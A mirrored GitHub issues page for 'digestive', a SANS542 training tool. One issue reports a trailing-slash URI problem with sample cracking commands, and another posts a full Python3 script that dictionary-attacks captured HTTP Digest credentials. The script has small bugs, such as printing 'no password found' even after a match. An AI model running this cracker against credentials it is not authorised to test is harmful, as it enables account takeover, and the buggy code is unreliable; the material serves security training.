Giter VIP home page Giter VIP logo

digestive's Issues

no pw found depending on "digest" parameter

Hi
I've tried the tool as part of the SANS542 training, during an exercise I noticed that the expected results was failing.
Basically no password was identified. After several test I figure out that if I leave the "/" char at the end of the "--uri" parameter the pw is not found .

so this works (/digest)
digestive --wordlist /opt/john/run/password.lst --username trillian --realm Security542 --uri /digest --qop auth --nc 00000001 --method GET --nonce y55hehYCBgA=b5e1e35bb64d45ffb508c61209d7f4970a6457c1 --response 690cc7fc7db3634475efe8a4e12646cf --cnonce 5da2ec5e8eebb9b1

this does not work (/digest/)

digestive --wordlist /opt/john/run/password.lst --username trillian --realm Security542 --uri /digest/ --qop auth --nc 00000001 --method GET --nonce y55hehYCBgA=b5e1e35bb64d45ffb508c61209d7f4970a6457c1 --response 690cc7fc7db3634475efe8a4e12646cf --cnonce 5da2ec5e8eebb9b1

but using your example in github works fine with the "/" at the end of digest...

what am I doing wrong ?
Thanks for helping

Python3 version

I don't want to create a Fork, so here is the Code for Python3. Just create a file named "digestive", paste this code in the file and use the same syntax as described in the README.

#!/usr/bin/python
# Eric Conrad (@eric_conrad)
# Modifyed for Python3 by Inflac
#
# Code based on: https://gist.github.com/yesecurity/5fb47f44e289e8bc9c35
# Thank you, yessecurity!
#  https://gist.github.com/yesecurity
#
# Launches dictionary attack vs captured HTTP Digest credentials (taken from
# a PCAP, Burp or ZAP proxy, etc.)
#
# Example credentials:
#
# Authorization: Digest username="conrad", realm="Security542", nonce="es3UMKyKBQA=14c0d9850599ab3d69ad238ae68e7ca167ced5a2", uri="/digest/", algorithm=MD5, response="f4be8f052a172cce14d8c4ab2340f25c", qop=auth, nc=00000001, cnonce="90755b083034b34a"
#
# Resulting commandline:
#
# ./digest.py --username conrad --wordlist /opt/john/run/password.lst --method GET --uri /digest/ --nc 00000001 --qop auth --realm Security542 --cnonce 90755b083034b34a  --nonce es3UMKyKBQA=14c0d9850599ab3d69ad238ae68e7ca167ced5a2 --response f4be8f052a172cce14d8c4ab2340f25c
#
import sys,itertools,argparse
import hashlib

parser = argparse.ArgumentParser()
parser.add_argument("--username", help="Username",required=True)
parser.add_argument("--wordlist", help="Path to the wordlist",required=True)
parser.add_argument("--method", help="HTTP method,required=True")
parser.add_argument("--nonce", help="nonce",required=True)
parser.add_argument("--cnonce", help="cnonce",required=True)
parser.add_argument("--uri", help="uri",required=True)
parser.add_argument("--qop", help="qop",required=True)
parser.add_argument("--response", help="response",required=True)
parser.add_argument("--nc", help="nc",required=True)
parser.add_argument("--realm", help="realm",required=True)
args = parser.parse_args()

wordlist=args.wordlist
nonce = args.nonce
uri = args.uri
username = args.username
method = args.method
nc = args.nc
qop = args.qop
cnonce = args.cnonce
response = args.response
realm=args.realm

with open(args.wordlist,encoding="ISO-8859-1") as f:  
    dictionary = f.read().splitlines()

for password in dictionary:
    h1 = (username+":"+realm+":"+password)
    ha1 = (hashlib.md5(h1.encode('utf-8')).hexdigest())

    h2 = (method+":"+uri)
    ha2 = (hashlib.md5(h2.encode('utf-8')).hexdigest())

    resp = (ha1+":"+nonce+":"+nc+":"+cnonce+":"+qop+":"+ha2)
    response2 = (hashlib.md5(resp.encode('utf-8')).hexdigest())

    if response2 == response:
        print("Username = " + username)
        print("Password = " + password)
        break
print("no password found")

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.